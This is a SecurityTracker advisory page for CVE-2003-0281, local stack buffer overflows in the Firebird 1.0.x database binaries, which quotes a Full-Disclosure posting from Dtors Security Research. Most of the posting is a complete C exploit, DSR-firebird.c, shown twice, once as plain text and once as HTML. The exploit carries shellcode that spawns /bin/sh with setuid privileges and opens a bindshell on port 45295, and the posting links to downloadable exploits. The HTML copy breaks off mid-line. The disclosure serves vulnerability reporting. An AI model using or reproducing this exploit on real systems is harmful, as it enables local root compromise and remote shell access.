SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Firebird Vendors:   firebird.sourceforge.net
Firebird Database Buffer Overflows Let Local Users Gain Elevated or Root Privileges
SecurityTracker Alert ID:  1006738
SecurityTracker URL:  http://securitytracker.com/id/1006738
CVE Reference:   CVE-2003-0281   (Links to External Site)
Updated:  Feb 29 2004
Original Entry Date:  May 10 2003
Impact:   Execution of arbitrary code via local system, Modification of user information, Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): 1.0.0, 1.0.2
Description:   Several buffer overflow vulnerabilities were reported in the Firebird database. A local user can obtain elevated privileges, potentially including root privileges.

Dtors Security Research reported that the gds_inet_server, gds_drop, and gds_lock_mgr applications do not perform proper bounds checking on variables returned by the getenv() function. A local user can set the INTERBASE environment variable to a specially crafted value to trigger the overflow and execute arbitrary code.

On FreeBSD, the software is installed by default with set user id (setuid) 'firebird' user privileges, so the code will run with the privileges of the database user account, according to the report. On Linux, the software is reportedly installed with setuid 'root' user privileges, allowing the code to run with root privileges.

On FreeBSD, once the local user has 'firebird' user privileges, the local user can modify the database binaries to include trojan code. Then, when a target user on the system executes the database, the local user can gain the privileges of that target user (including those of root users).

Some demonstration exploit code is provided in the Source Message.

Impact:   A local user can execute arbitrary code with 'firebird' user privileges or 'root' user privileges, depending on the installation.

With 'firebird' user privileges, the local user can modify the database application to obtain elevated privileges when a target user runs the database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  firebird.sourceforge.net/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 23 2004 (Gentoo Issues Fix) Firebird Database Buffer Overflows Let Local Users Gain Elevated or Root Privileges
Gentoo has released a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Firebird local root compromise


This is a multi-part message in MIME format.

------=_NextPart_000_0011_01C3167B.9FAC8D20
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-[[Dtors Security Research]]-
-[[     www.dtors.net     ]]-

-[Package: Firebird_1.0.2 [FreeBSD]
-[Versions Affected: 1.0.2 <
-[Website: http://firebird.sf.net
-[Exploit: Local Stack Overflow
-[Date: 22/03/2003
-[Author: bob@dtors.net && kokanin@dtors.net

---[BACKGROUND

Firebird is a relational database offering many ANSI SQL-92 features
that runs on Linux, Windows, and a variety of Unix platforms. Firebird
offers excellent concurrency, high performance, and powerful language
support for stored procedures and triggers. It has been used in
production systems, under a variety of names since 1981.=20

For more information on Firebird and InterBase, see:

http://sourceforge.net/projects/firebird/
http://www.ibphoenix.com/
http://www.interbase2000.org/
http://www.interbase.com/
http://www.firebirdsql.org/


--[DESCRIPTION

Firebird has 3 binarys [gds_inet_server, gds_drop, and gds_lock_mgr],
which all use insufficent bounds checking in conjunction with getenv(), =
making each one
succeptable to local exploitation.

Firebird is by default setuid[firebird]. This exploit can lead to =
root/escalated=20
privileges, should the attacker trojan the local firebird application.



--[ANALYSIS

Upon setting a large value for the INTERBASE environment variable a =
buffer
can be overflowed. Links to the exploit should accompany this advisory.
=20
--[Please note that there is an exploit written for both versions of =
firebird.

Exploiting this hole will allow the attacker to, amongst other things,
manipulate and/or destroy the databases, and also add the option to =
trojan
the firebird binaries. This will in effect allow for compromising of =
other
users/root accounts.

--[SYSTEMS AFFECTED:

firebird 1.0.0 [BSD/Linux] are vulnerable.
firebird-1.0.2 [BSD/Linux] are vulnerable.


--[EXPLOIT CODE

/* DSR-firebird.c by bob@dtors.net
   -------------------------------

Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE

bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( (                           by - bob@dtors.net ) )
----------------------------------------------------

Usage: ./DSR-firebird <target#>=20
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop

www.dtors.net
bash-2.05a$

Thanks goto eSDee && ilja for helping me
with the gds_lock_mgr problems.

bob@dtors.net
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
#define LEN     1056

char dropcode[]=3D
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"=20
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";=20

char inetcode[]=3D
        "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"=20
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
   "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
   "\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";=20

                           =20

char lockcode[]=3D=20
 "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
 "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"
 "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" file://setuid[firebird] by =
bob
 "\x31\xc0\x31\xdb\x53\xb3\x06\x53" file://fork() bindshell by eSDee
 "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
 "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
 "\x50\x50\x66\x68\xb0\xef\xb7\x02"
      "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
      "\x53\x51\x57\x50\xb0\x68\xcd\x80"
      "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
      "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
      "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
      "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
      "\xe2\x50\x51\x52\xb3\x14\x53\x50"
      "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
      "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
      "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
      "\x39\xc3\x75\x44\x31\xc0\x57\x50"
      "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
      "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
      "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
      "\x80\x31\xc0\x43\x53\x56\x50\xb0"
      "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
      "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
      "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
      "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
      "\xeb\x9a";

char *decide(char *string)
{
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);
    exit(0);
}

int main(int argc, char **argv)
{
=20
 unsigned long ret =3D 0xbfbff743;
  =20
 char *selectcode;
 char buffer[LEN];
 char egg[1024];
 char *ptr;
 int i=3D0;

 =20

 if(argc < 2)
 {
  printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");=20
  printf("( (                           by - bob@dtors.net ) )\n");
  printf("----------------------------------------------------\n\n");
  printf("Usage: %s <target#> \n", argv[0]);
  printf("Targets:\n");
  printf("1. [0xbfbff743] - gds_inet_server\n");
  printf("2. [0xbfbff743] - gds_lock_mgr\n");
  printf("3. [0xbfbff743] - gds_drop\n");
  printf("\nwww.dtors.net\n");
  exit(0);
 }
 =20
 selectcode =3D (char *)decide(argv[1]);
   memset(buffer, 0x41, sizeof(buffer));

        ptr =3D egg;

        for (i =3D 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) =
=3D 0x90;
        for (i =3D 0; i < strlen(selectcode); i++) *(ptr++) =3D =
selectcode[i];
        egg[1024 - 1] =3D '\0';

        memcpy(egg,"EGG=3D",4);
        putenv(egg);

        memcpy(&buffer[1052],(char *)&ret,4);
        buffer[1056] =3D 0;

        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

if(selectcode =3D=3D (char *)&inetcode)
  {
 execl(INET, INET, NULL);
 return 0;
   }

if(selectcode =3D=3D (char *)&lockcode)
  {
  printf("\nShell is on port 45295\nExploit will hang!\n");
 execl(LOCK, LOCK, NULL);
 return 0;
   }

if(selectcode =3D=3D (char *)&dropcode)
  {
 execl(DROP, DROP, NULL);
 return 0;
   }

=20
 return 0;
}

--[Misc

As stated earlier, Linux is also vulnerable. The problem here
is that Linux by default sets firebird setuid root. There
exist a few more problems with linux. For example some command
line overflows with certain switches will allow the attacker
to change the flow of execution, or it can be changed using
the enviroment variable [FIREBIRD_LOCK].

This whole package should be revised before the next release.

Firebird 1.0.0 exploit @ http://bob.dtors.net/DSR-olbird.c
Firebird 1.0.2 exploit @ http://bob.dtors.net/DSR-firebird.c


--[CREDIT

kokanin@dtors.net
bob@dtors.net



------=_NextPart_000_0011_01C3167B.9FAC8D20
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.3502.5390" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT size=3D2><FONT face=3D"Courier New">-[[Dtors Security=20
Research]]-<BR>-[[&nbsp;&nbsp;&nbsp;&nbsp; </FONT><A=20
href=3D"http://www.dtors.net"><FONT=20
face=3D"Courier New">www.dtors.net</FONT></A><FONT=20
face=3D"Courier New">&nbsp;&nbsp;&nbsp;&nbsp; ]]-</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">-[Package: Firebird_1.0.2 =

[FreeBSD]<BR>-[Versions Affected: 1.0.2 &lt;<BR>-[Website: </FONT><A=20
href=3D"http://firebird.sf.net"><FONT=20
face=3D"Courier New">http://firebird.sf.net</FONT></A><BR><FONT=20
face=3D"Courier New">-[Exploit: Local Stack Overflow<BR>-[Date:=20
22/03/2003<BR>-[Author: </FONT><A href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A><FONT face=3D"Courier New"> =
&amp;&amp;=20
</FONT><A href=3D"mailto:kokanin@dtors.net"><FONT=20
face=3D"Courier New">kokanin@dtors.net</FONT></A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>---[BACKGROUND</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Firebird is a relational =
database offering=20
many ANSI SQL-92 features<BR>that runs on Linux, Windows, and a variety =
of Unix=20
platforms. Firebird<BR>offers excellent concurrency, high performance, =
and=20
powerful language<BR>support for stored procedures and triggers. It has =
been=20
used in<BR>production systems, under a variety of names since 1981.=20
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>For more information on =
Firebird and=20
InterBase, see:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><A =
href=3D"http://sourceforge.net/projects/firebird/"><FONT=20
face=3D"Courier =
New">http://sourceforge.net/projects/firebird/</FONT></A><BR><A=20
href=3D"http://www.ibphoenix.com/"><FONT=20
face=3D"Courier New">http://www.ibphoenix.com/</FONT></A><BR><A=20
href=3D"http://www.interbase2000.org/"><FONT=20
face=3D"Courier New">http://www.interbase2000.org/</FONT></A><BR><A=20
href=3D"http://www.interbase.com/"><FONT=20
face=3D"Courier New">http://www.interbase.com/</FONT></A><BR><A=20
href=3D"http://www.firebirdsql.org/"><FONT=20
face=3D"Courier New">http://www.firebirdsql.org/</FONT></A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><BR><FONT=20
face=3D"Courier New">--[DESCRIPTION</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Firebird has 3 binarys =
[gds_inet_server,=20
gds_drop, and gds_lock_mgr],<BR>which all use insufficent bounds =
checking in=20
conjunction with getenv(), making each one<BR>succeptable to local=20
exploitation.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Firebird is by default =
setuid[firebird].=20
This exploit can lead to root/escalated <BR>privileges, should the =
attacker=20
trojan the local firebird application.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2></FONT>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>--[ANALYSIS</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Upon setting a large value for =
the=20
INTERBASE environment variable a buffer<BR>can be overflowed. Links to =
the=20
exploit should accompany this advisory.<BR>&nbsp;<BR>--[Please note that =
there=20
is an exploit written for both versions of firebird.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Exploiting this hole will allow =
the=20
attacker to, amongst other things,<BR>manipulate and/or destroy the =
databases,=20
and also add the option to trojan<BR>the firebird binaries. This will in =
effect=20
allow for compromising of other<BR>users/root accounts.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>--[SYSTEMS =
AFFECTED:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>firebird 1.0.0 [BSD/Linux] are=20
vulnerable.<BR>firebird-1.0.2 [BSD/Linux] are vulnerable.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><BR><FONT face=3D"Courier New">--[EXPLOIT=20
CODE</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">/* DSR-firebird.c by =
</FONT><A=20
href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A><BR><FONT=20
face=3D"Courier New">&nbsp;&nbsp;=20
-------------------------------</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Tested on: Firebird 1.0.2 =
FreeBSD=20
4.7-RELEASE</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">bash-2.05a$ =
./DSR-firebird<BR>( (=20
Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )<BR>(=20
(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;=20
by - </FONT><A href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A><FONT face=3D"Courier New"> =
)=20
)<BR>----------------------------------------------------</FONT></FONT></=
DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Usage: ./DSR-firebird =
&lt;target#&gt;=20
<BR>Targets:<BR>1. [0xbfbff75d] - gds_inet_server<BR>2. [0xbfbff75c] -=20
gds_lock_mgr<BR>3. [0xbfbff75e] - gds_drop</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><A href=3D"http://www.dtors.net"><FONT=20
face=3D"Courier New">www.dtors.net</FONT></A><BR><FONT=20
face=3D"Courier New">bash-2.05a$</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>Thanks goto eSDee &amp;&amp; =
ilja for=20
helping me<BR>with the gds_lock_mgr problems.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><A href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A><BR><FONT=20
face=3D"Courier New">*/</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><BR><FONT face=3D"Courier New">#include=20
&lt;stdio.h&gt;<BR>#include &lt;stdlib.h&gt;<BR>#include=20
&lt;string.h&gt;<BR>#define LOCK&nbsp;&nbsp;&nbsp;=20
"/usr/local/firebird/bin/gds_lock_mgr"<BR>#define DROP&nbsp;&nbsp;&nbsp; =

"/usr/local/firebird/bin/gds_drop"<BR>#define INET&nbsp;&nbsp;&nbsp;=20
"/usr/local/firebird/bin/gds_inet_server"<BR>#define =
LEN&nbsp;&nbsp;&nbsp;&nbsp;=20
1056</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>char=20
dropcode[]=3D<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"<BR>&nbsp;&nbsp;=20
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"<BR>&nbsp;&nbsp;=20
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>char=20
inetcode[]=3D<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"<BR>&nbsp;&nbsp;=20
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"<BR>&nbsp;&nbsp;=20
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New"=20
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;=20
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">char lockcode[]=3D=20
<BR>&nbsp;"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"<BR>&nbsp;"\x39\xc3\x75\x06\x=
31\xc0\xb0\x01\xcd\x80"<BR>&nbsp;"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x8=
0"=20
</FONT><A href=3D"file://setuid"><FONT=20
face=3D"Courier New">file://setuid</FONT></A><FONT face=3D"Courier =
New">[firebird]=20
by bob<BR>&nbsp;"\x31\xc0\x31\xdb\x53\xb3\x06\x53" </FONT><A=20
href=3D"file://fork"><FONT face=3D"Courier =
New">file://fork</FONT></A><FONT=20
face=3D"Courier New">() bindshell by=20
eSDee<BR>&nbsp;"\xb3\x01\x53\xb3\x02\x53\x54\xb0"<BR>&nbsp;"\x61\xcd\x80\=
x89\xc7\x31\xc0\x50"<BR>&nbsp;"\x50\x50\x66\x68\xb0\xef\xb7\x02"<BR>&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x66\x53\x89\xe1\x31\xdb\xb3\x10"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x53\x51\x57\x50\xb0\x68\xcd\x80"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xdb\x39\xc3\x74\x06\x31\xc0"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xb0\x01\xcd\x80\x31\xc0\x50\x57"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xdb\x50\x89\xe1\xb3\x01\x53\x89"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xe2\x50\x51\x52\xb3\x14\x53\x50"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xb0\x2e\xcd\x80\x31\xc0\x50\x50"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x39\xc3\x75\x44\x31\xc0\x57\x50"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xb0\x06\xcd\x80\x31\xc0\x50\x56"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xdb\x43\x53\x56\x50\xb0\x5a\xcd"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x80\x31\xc0\x43\x53\x56\x50\xb0"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x5a\xcd\x80\x31\xc0\x50\x68\x2f"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x89\xe3\x50\x54\x53\x50\xb0\x3b"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\x31\xc0\x56\x50\xb0\x06\xcd\x80"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
"\xeb\x9a";</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>char *decide(char=20
*string)<BR>{<BR>&nbsp;&nbsp;&nbsp; if(!(strcmp(string,=20
"1")))<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return((char=20
*)&amp;inetcode);<BR>&nbsp;&nbsp;&nbsp; if(!(strcmp(string,=20
"2")))<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return((char=20
*)&amp;lockcode);<BR>&nbsp;&nbsp;&nbsp; if(!(strcmp(string,=20
"3")))<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return((char=20
*)&amp;dropcode);<BR>&nbsp;&nbsp;&nbsp; exit(0);<BR>}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>int main(int argc, char=20
**argv)<BR>{<BR>&nbsp;<BR>&nbsp;unsigned long ret =3D =
0xbfbff743;<BR>&nbsp;&nbsp;=20
<BR>&nbsp;char *selectcode;<BR>&nbsp;char buffer[LEN];<BR>&nbsp;char=20
egg[1024];<BR>&nbsp;char *ptr;<BR>&nbsp;int i=3D0;</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>&nbsp; </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">&nbsp;if(argc &lt;=20
2)<BR>&nbsp;{<BR>&nbsp;&nbsp;printf("( ( Firebird-1.0.2 Local exploit =
for=20
Freebsd 4.7 ) )\n"); <BR>&nbsp;&nbsp;printf("(=20
(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;=20
by - </FONT><A href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A><FONT face=3D"Courier New"> =
)=20
)\n");<BR>&nbsp;&nbsp;printf("-------------------------------------------=
---------\n\n");<BR>&nbsp;&nbsp;printf("Usage:=20
%s &lt;target#&gt; \n",=20
argv[0]);<BR>&nbsp;&nbsp;printf("Targets:\n");<BR>&nbsp;&nbsp;printf("1. =

[0xbfbff743] - gds_inet_server\n");<BR>&nbsp;&nbsp;printf("2. =
[0xbfbff743] -=20
gds_lock_mgr\n");<BR>&nbsp;&nbsp;printf("3. [0xbfbff743] -=20
gds_drop\n");<BR>&nbsp;&nbsp;printf("\nwww.dtors.net\n");<BR>&nbsp;&nbsp;=
exit(0);<BR>&nbsp;}<BR>&nbsp;=20
<BR>&nbsp;selectcode =3D (char *)decide(argv[1]);<BR>&nbsp; =
&nbsp;memset(buffer,=20
0x41, sizeof(buffer));</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
ptr =3D egg;</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
for (i =3D 0; i &lt; 1024 - strlen(selectcode) -1; i++) *(ptr++) =3D=20
0x90;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for (i =3D 0; i &lt; =

strlen(selectcode); i++) *(ptr++) =3D=20
selectcode[i];<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; egg[1024 - =
1] =3D=20
'\0';</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
memcpy(egg,"EGG=3D",4);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
putenv(egg);</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
memcpy(&amp;buffer[1052],(char=20
*)&amp;ret,4);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
buffer[1056] =3D=20
0;</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
setenv("INTERBASE", buffer, 1);</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" =
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
fprintf(stdout, "Return Address: 0x%x\n",=20
ret);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stdout, =
"Buffer=20
Size: %d\n", LEN);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
fprintf(stdout,=20
"Setuid [90]\n");</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>if(selectcode =3D=3D (char=20
*)&amp;inetcode)<BR>&nbsp; {<BR>&nbsp;execl(INET, INET, =
NULL);<BR>&nbsp;return=20
0;<BR>&nbsp;&nbsp; }</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>if(selectcode =3D=3D (char=20
*)&amp;lockcode)<BR>&nbsp; {<BR>&nbsp;&nbsp;printf("\nShell is on port=20
45295\nExploit will hang!\n");<BR>&nbsp;execl(LOCK, LOCK, =
NULL);<BR>&nbsp;return=20
0;<BR>&nbsp;&nbsp; }</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>if(selectcode =3D=3D (char=20
*)&amp;dropcode)<BR>&nbsp; {<BR>&nbsp;execl(DROP, DROP, =
NULL);<BR>&nbsp;return=20
0;<BR>&nbsp;&nbsp; }</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>&nbsp;<BR>&nbsp;return =
0;<BR>}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>--[Misc</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>As stated earlier, Linux is =
also=20
vulnerable. The problem here<BR>is that Linux by default sets firebird =
setuid=20
root. There<BR>exist a few more problems with linux. For example some=20
command<BR>line overflows with certain switches will allow the =
attacker<BR>to=20
change the flow of execution, or it can be changed using<BR>the =
enviroment=20
variable [FIREBIRD_LOCK].</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3D"Courier New" size=3D2>This whole package should be =
revised before=20
the next release.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><FONT face=3D"Courier New">Firebird 1.0.0 exploit @ =
